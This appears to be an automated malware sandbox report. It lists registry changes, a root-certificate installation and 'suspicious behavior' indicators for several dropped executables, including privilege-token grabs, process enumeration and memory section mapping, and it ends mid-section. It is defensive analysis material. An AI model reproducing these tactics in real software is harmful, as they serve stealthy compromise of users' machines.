10062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e60703004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000002939ba1bc734d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a0066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d0000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "3" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f80cb859f6720028040b29b5540cc05aab60000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "520" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "92" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "692" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "132914217620851098" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE -
Processes:
Tue029560e6534e190c.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Tue029560e6534e190c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Tue029560e6534e190c.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
Explorer.EXEpid process 2000 Explorer.EXE 2000 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exeTue02522f9ea0b1.exeExplorer.EXEpid process 2380 taskmgr.exe 2380 taskmgr.exe 1896 Tue02522f9ea0b1.exe 1896 Tue02522f9ea0b1.exe 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
Processes:
Explorer.EXETue026e182673.exetaskmgr.exesystemreset.exetaskmgr.exepid process 2000 Explorer.EXE 1488 Tue026e182673.exe 2380 taskmgr.exe 1392 systemreset.exe 2380 taskmgr.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
Tue02522f9ea0b1.exeRkeagtomax1.exeExplorer.EXEcrsjwaapid process 1896 Tue02522f9ea0b1.exe 4136 Rkeagtomax1.exe 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 2000 Explorer.EXE 4532 crsjwaa -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
Processes:
chrome.exechrome.exechrome.exepid process 4632 chrome.exe 4632 chrome.exe 4632 chrome.exe 4632 chrome.exe 4632 chrome.exe 752 chrome.exe 752 chrome.exe 752 chrome.exe 752 chrome.exe 2092 chrome.exe 2092 chrome.exe 2092 chrome.exe 2092 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskmgr.exeTue02976fcdf1.exeTue02dc626f48.exeTue02705f9c2b455.exetaskkill.exepowershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 2380 taskmgr.exe Token: SeSystemProfilePrivilege 2380 taskmgr.exe Token: SeCreateGlobalPrivilege 2380 taskmgr.exe Token: SeDebugPrivilege 1716 Tue02976fcdf1.exe Token: SeCreateTokenPrivilege 1972 Tue02dc626f48.exe Token: SeAssignPrimaryTokenPrivilege 1972 Tue02dc626f48.exe Token: SeLockMemoryPrivilege 1972 Tue02dc626f48.exe Token: SeIncreaseQuotaPrivilege 1972 Tue02dc626f48.exe Token: SeMachineAccountPrivilege 1972 Tue02dc626f48.exe Token: SeTcbPrivilege 1972 Tue02dc626f48.exe Token: SeSecurityPrivilege 1972 Tue02dc626f48.exe Token: SeTakeOwnershipPrivilege 1972 Tue02dc626f48.exe Token: SeLoadDriverPrivilege 1972 Tue02dc626f48.exe Token: SeSystemProfilePrivilege 1972 Tue02dc626f48.exe Token: SeSystemtimePrivilege 1972 Tue02dc626f48.exe Token: SeProfSingleProcessPrivilege 1972 Tue02dc626f48.exe Token: SeIncBasePriorityPrivilege 1972 Tue02dc626f48.exe Token: SeCreatePagefilePrivilege 1972 Tue02dc626f48.exe Token: SeCreatePermanentPrivilege 1972 Tue02dc626f48.exe Token: SeBackupPrivilege 1972 Tue02dc626f48.exe Token: SeRestorePrivilege 1972 Tue02dc626f48.exe Token: SeShutdownPrivilege 1972 Tue02dc626f48.exe Token: SeDebugPrivilege 1972 Tue02dc626f48.exe Token: SeAuditPrivilege 1972 Tue02dc626f48.exe Token: SeSystemEnvironmentPrivilege 1972 Tue02dc626f48.exe Token: SeChangeNotifyPrivilege 1972 Tue02dc626f48.exe Token: SeRemoteShutdownPrivilege 1972 Tue02dc626f48.exe Token: SeUndockPrivilege 1972 Tue02dc626f48.exe Token: SeSyncAgentPrivilege 1972 Tue02dc626f48.exe Token: SeEnableDelegationPrivilege 1972 Tue02dc626f48.exe Token: SeManageVolumePrivilege 1972 Tue02dc626f48.exe Token: SeImpersonatePrivilege 1972 Tue02dc626f48.exe Token: SeCreateGlobalPrivilege 1972 Tue02dc626f48.exe Token: 31 1972 Tue02dc626f48.exe Token: 32 1972 Tue02dc626f48.exe Token: 33 1972 Tue02dc626f48.exe Token: 34 1972 Tue02dc626f48.exe Token: 35 1972 Tue02dc626f48.exe Token: SeDebugPrivilege 1320 Tue02705f9c2b455.exe Token: SeDebugPrivilege 4380 taskkill.exe Token: SeDebugPrivilege 3524 powershell.exe Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE Token: SeCreatePagefilePrivilege 2000 Explorer.EXE Token: SeShutdownPrivilege 2000 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exeSta.exe.pifExplorer.EXEpid process 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 4484 Sta.exe.pif 2000 Explorer.EXE 2000 Explorer.EXE 4484 Sta.exe.pif 4484 Sta.exe.pif 2000 Explorer.EXE 2000 Explorer.EXE 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe 2380 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
